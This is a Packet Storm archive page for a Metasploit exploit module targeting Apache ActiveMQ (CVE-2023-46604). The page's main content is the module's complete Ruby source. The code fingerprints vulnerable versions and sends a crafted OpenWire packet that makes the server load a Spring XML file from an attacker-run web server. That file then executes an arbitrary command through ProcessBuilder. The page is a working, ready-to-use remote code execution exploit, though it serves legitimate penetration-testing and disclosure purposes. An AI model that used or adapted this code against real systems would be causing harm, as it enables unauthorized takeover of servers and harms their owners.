exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Apache ActiveMQ Unauthenticated Remote Code Execution

Apache ActiveMQ Unauthenticated Remote Code Execution
Posted Nov 14, 2023
Authored by sfewer-r7, X1r0z | Site metasploit.com

This Metasploit module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache ActiveMQ. Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to 5.16.6, and all versions before 5.15.16.

tags | exploit
advisories | CVE-2023-46604
SHA-256 | d62b07b49999cf639cee2c97c21a92b797b2c59f3353f6f4b3a0a040950ac02e

Apache ActiveMQ Unauthenticated Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Retry

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache ActiveMQ Unauthenticated Remote Code Execution',
'Description' => %q{
This module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache
ActiveMQ. Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to
5.16.6, and all versions before 5.15.16.
},
'License' => MSF_LICENSE,
'Author' => [
'X1r0z', # Original technical analysis & exploit
'sfewer-r7', # MSF exploit & Rapid7 analysis
],
'References' => [
['CVE', '2023-46604'],
['URL', 'https://github.com/X1r0z/ActiveMQ-RCE'],
['URL', 'https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/'],
['URL', 'https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis'],
['URL', 'https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt']
],
'DisclosureDate' => '2023-10-27',
'Privileged' => false,
'Platform' => %w[win linux unix],
'Arch' => [ARCH_CMD],
# The Msf::Exploit::Remote::HttpServer mixin will bring in Exploit::Remote::SocketServer, this will set the
# Stance to passive, which is unexpected and results in the exploit running as a background job, as RunAsJob will
# be set to true. To avoid this happening, we explicitly set the Stance to Aggressive.
'Stance' => Stance::Aggressive,
'Targets' => [
[
'Windows',
{
'Platform' => 'win'
}
],
[
'Linux',
{
'Platform' => 'linux'
}
],
[
'Unix',
{
'Platform' => 'unix'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
# By default ActiveMQ listens for OpenWire requests on TCP port 61616.
'RPORT' => 61616,
# The maximum time in seconds to wait for a session.
'WfsDelay' => 30
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
end

def check
connect

res = sock.get_once

disconnect

return CheckCode::Unknown unless res

len, _, magic = res.unpack('NCZ*')

return CheckCode::Unknown unless res.length == len + 4

return CheckCode::Unknown unless magic == 'ActiveMQ'

return CheckCode::Detected unless res =~ /ProviderVersion...(\d+\.\d+\.\d+)/

version = Rex::Version.new(::Regexp.last_match(1))

ranges = [
['5.18.0', '5.18.2'],
['5.17.0', '5.17.5'],
['5.16.0', '5.16.6'],
['0.0.0', '5.15.15']
]

ranges.each do |min, max|
if version.between?(Rex::Version.new(min), Rex::Version.new(max))
return Exploit::CheckCode::Appears("Apache ActiveMQ #{version}")
end
end

Exploit::CheckCode::Safe("Apache ActiveMQ #{version}")
end

def exploit
# The payload is send in a CDATA section of an XML file. Therefore, the payload cannot contain a CDATA closing tag.
if payload.encoded.include? ']]>'
fail_with(Failure::BadConfig, 'The encoded payload data may not contain the CDATA closing tag ]]>')
end

start_service

connect

# The vulnerability allows us to instantiate an arbitrary class, with a single arbitrary string parameter. To
# leverage this we can use ClassPathXmlApplicationContext, and pass a URL to an XML configuration file we
# serve. This XML file allows us to create arbitrary classes, and call arbitrary methods. This is leveraged to
# run an attacker supplied command line via java.lang.ProcessBuilder.start.
clazz = 'org.springframework.context.support.ClassPathXmlApplicationContext'

# 31 is the EXCEPTION_RESPONSE data type.
data = [31].pack('C')
# ResponseMarshaller.looseUnmarshal reads a 4 byte int for the command id.
data << [0].pack('N')
# and a 1 byte boolean for response required.
data << [0].pack('C')
# ResponseMarshaller.looseUnmarshal read a 4 byte int for the correlation ID.
data << [0].pack('N')
# BaseDataStreamMarshaller.looseUnmarsalThrowable wants a boolean true to continue to unmarshall.
data << [1].pack('C')
# BaseDataStreamMarshaller.looseUnmarshalString reads a byte boolean and if true, reads a UTF-8 string.
data << [1].pack('C')
# First 2 bytes are the length.
data << [clazz.length].pack('n')
# Then the string data. This is the class name to instantiate.
data << clazz
# Same again for the method string. This is the single string parameter used during class instantiation.
data << [1].pack('C')
data << [get_uri.length].pack('n')
data << get_uri

sock.puts([data.length].pack('N') + data)

retry_until_truthy(timeout: datastore['WfsDelay']) do
!handler_enabled? || session_created?
end

handler
ensure
cleanup
end

def on_request_uri(cli, request)
if request.uri != get_resource
super
end

case target['Platform']
when 'win'
shell = 'cmd.exe'
flag = '/c'
when 'linux', 'unix'
shell = '/bin/sh'
flag = '-c'
end

xml = %(<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="#{Rex::Text.rand_text_alpha(8)}" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>#{shell}</value>
<value>#{flag}</value>
<value><![CDATA[#{payload.encoded}]]></value>
</list>
</constructor-arg>
</bean>
</beans>)

send_response(cli, xml, {
'Content-Type' => 'application/xml',
'Connection' => 'close',
'Pragma' => 'no-cache'
})

print_status('Sent ClassPathXmlApplicationContext configuration file.')
end

end
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close